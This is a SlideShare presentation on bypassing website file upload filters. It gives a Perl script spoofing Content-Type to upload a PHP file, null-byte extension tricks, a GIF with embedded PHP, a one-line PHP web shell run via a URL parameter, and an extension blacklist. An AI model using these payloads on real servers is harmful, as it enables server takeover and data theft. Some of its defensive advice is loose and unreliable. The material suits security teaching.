Bypass file upload restrictions

18,512 views

Published on

Bypass file upload restrictions

Published in: Education, Technology
1 Comment
5 Likes
Statistics
Notes
No Downloads
Views
Total views
18,512
On SlideShare
0
From Embeds
0
Number of Embeds
16
Actions
Shares
0
Downloads
124
Comments
1
Likes
5
Embeds 0
No embeds

No notes for slide

Bypass file upload restrictions

  1. 1. BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES AND SECURITY MEASURES By K. Subramanian K. R. Mukesh
  2. 2. File upload • Necessity • Social networking websites, blogs, File sharing, etc. • Web developers do not consider the threats • Files should be sanitized • If not, leads to local file inclusion and hacking • Filtering mechanisms
  3. 3. Methods of filtering
  4. 4. Content-Type verification • HTTP POST – MIME type Content-Disposition: form-data; name="uploaded file []";filename="18.jpg"rn Content-Type : image/jpegrnr <file content> • To bypass this filter, edit the Content-Type to an applicable one. #!/usr/bin/perl # use LWP; use HTTP::Request::Common; $ua = $ua = LWP::UserAgent->new;; $req = $ua->request(POST 'http://example.com/upload.PHP', Content_Type => 'form-data', Content => [ userfile => ["sh.PHP", "sh.PHP", "Content-Type" => "application/pdf"], ], ); print $req->as_string();
  5. 5. An easy way – Tamper data • Tamper data – Mozilla add-on allows to modify the POST data before submit
  6. 6. Filename extension verification • Check the extension of the file • Filter out malicious extensions $blacklist = array(".php", ".phtml", ".php3", ".php4"); • To bypass this, use NULL BYTES in filename sh.php%00.pdf (or) sh.asp;xx.pdf • While uploading, extension is .pdf • When accessed, delivered to PHP interpreter
  7. 7. File content verification • Applicable to image files • $imageinfo =getimagesize($_FILES['userfile']['tmp_name']); • To bypass this, manually craft an image file with an embedded PHP code Content-Type: image/gif GIF89a(...some binary data...)<?PHP System($_GET[‘command’]);?> (....binary data…) • PHP interpreter execute the php code inside a garbage of binary values
  8. 8. A Simple Demonstration Towards Bypassing these Filters
  9. 9. Worst case scenario • Local file inclusion – PHP shell upload • Simple PHP shell: <?php System ($_GET [‘command’]);?> • Executes commands on remote server www.example.com/uploads/sh.php?command=‘ifconfig’ • Entire control of the server – rooting it • Defacements, database access, credential information theft, etc.
  10. 10. Security Measures • Preventing direct access to the uploaded files $uploaddir = '/var/spool/uploads/'; # Outside of root • Block web access using .htaccess file IndexIgnore */* • Overhead to read and write • Sometimes leads to potential directory traversal attacks
  11. 11. Random file name implementation • Prevents attacker knowing the name of the file uploaded • Map the names in the database $res = $db->query("INSERT INTO uploads SET name=?,original_name=?”) • Query while reading • A little overhead, but secure • Think again, leads to SQL injection
  12. 12. Conclusion • Complicated to implement a secure file upload facility • Many filters = slow response. Leads to Denial Of Service (DOS) attacks • Best way is to maintain UPLOAD LOGS containing user info like ip address, helpful to trace an attacker • Secure coding practices
  13. 13. Thank you

×